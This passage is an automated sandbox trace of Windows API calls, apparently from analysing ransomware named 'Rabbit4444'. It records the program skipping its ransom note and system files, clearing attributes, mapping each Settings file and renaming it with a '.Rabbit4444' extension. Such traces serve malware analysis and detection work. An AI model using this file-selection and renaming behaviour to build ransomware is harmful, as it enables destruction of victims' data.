(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.680] lstrlenW (lpString="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms") returned 67 [0057.680] lstrlenW (lpString="Rabbit4444") returned 10 [0057.680] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.680] lstrlenW (lpString=".dll") returned 4 [0057.680] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.680] lstrlenW (lpString=".lnk") returned 4 [0057.680] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.680] lstrlenW (lpString=".ini") returned 4 [0057.680] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.680] lstrlenW (lpString=".sys") returned 4 [0057.680] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_musupdate_advancedsettingslink.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.680] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.681] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14899129525) returned 1 [0057.681] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1280) returned 1 [0057.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0057.681] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.684] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.685] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.685] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.685] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.685] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.685] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.686] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14899653525) returned 1 [0057.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0057.686] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.686] CloseHandle (hObject=0x298) returned 1 [0057.686] CloseHandle (hObject=0x278) returned 1 [0057.686] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms.Rabbit4444") returned 195 [0057.686] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_musupdate_advancedsettingslink.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_musupdate_advancedsettingslink.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.687] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ffb558f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2ffb558f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", cAlternateFileName="AA469D~1.SET")) returned 1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2=".") returned 1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="..") returned 1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="windows") returned -1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="boot") returned -1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.687] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.687] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms" | out: lpString1="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms") returned="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms" [0057.687] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.688] lstrlenW (lpString="AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms") returned 65 [0057.688] lstrlenW (lpString="Rabbit4444") returned 10 [0057.688] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.688] lstrlenW (lpString=".dll") returned 4 [0057.688] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.688] lstrlenW (lpString=".lnk") returned 4 [0057.688] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.688] lstrlenW (lpString=".ini") returned 4 [0057.688] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.688] lstrlenW (lpString=".sys") returned 4 [0057.688] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_musupdate_updateactionbutton.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.688] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.688] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14899901838) returned 1 [0057.688] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1270) returned 1 [0057.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.688] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.689] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.691] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14900155736) returned 1 [0057.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.691] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.691] CloseHandle (hObject=0x298) returned 1 [0057.691] CloseHandle (hObject=0x278) returned 1 [0057.691] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms.Rabbit4444") returned 193 [0057.691] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_musupdate_updateactionbutton.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_musupdate_updateactionbutton.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.692] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301cb66d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x301cb66d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", cAlternateFileName="AADDFE~1.SET")) returned 1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2=".") returned 1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="..") returned 1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="windows") returned -1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="boot") returned -1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.692] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.692] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms") returned="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms" [0057.692] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.693] lstrlenW (lpString="AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms") returned 69 [0057.693] lstrlenW (lpString="Rabbit4444") returned 10 [0057.693] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.693] lstrlenW (lpString=".dll") returned 4 [0057.693] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.693] lstrlenW (lpString=".lnk") returned 4 [0057.693] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.693] lstrlenW (lpString=".ini") returned 4 [0057.693] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.693] lstrlenW (lpString=".sys") returned 4 [0057.693] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.693] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_pinnedquickactions.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.693] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.693] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14900407701) returned 1 [0057.693] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1294) returned 1 [0057.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0057.693] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.694] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.696] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14900648224) returned 1 [0057.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0057.696] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.696] CloseHandle (hObject=0x298) returned 1 [0057.696] CloseHandle (hObject=0x278) returned 1 [0057.696] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms.Rabbit4444") returned 197 [0057.696] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_pinnedquickactions.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_pinnedquickactions.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.697] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30a96164, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x30a96164, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", cAlternateFileName="AAA6C3~1.SET")) returned 1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2=".") returned 1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="..") returned 1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="windows") returned -1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="boot") returned -1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.697] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.697] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms") returned="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms" [0057.697] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.698] lstrlenW (lpString="AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms") returned 79 [0057.698] lstrlenW (lpString="Rabbit4444") returned 10 [0057.698] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.698] lstrlenW (lpString=".dll") returned 4 [0057.698] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.698] lstrlenW (lpString=".lnk") returned 4 [0057.698] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.698] lstrlenW (lpString=".ini") returned 4 [0057.698] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.698] lstrlenW (lpString=".sys") returned 4 [0057.698] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.698] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_selecticonstoappearontaskbar.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.698] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.698] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14900887864) returned 1 [0057.698] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1344) returned 1 [0057.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0057.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.698] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.699] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.701] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14901137281) returned 1 [0057.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0057.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.701] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.701] CloseHandle (hObject=0x298) returned 1 [0057.701] CloseHandle (hObject=0x278) returned 1 [0057.701] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms.Rabbit4444") returned 207 [0057.701] MoveFileExW 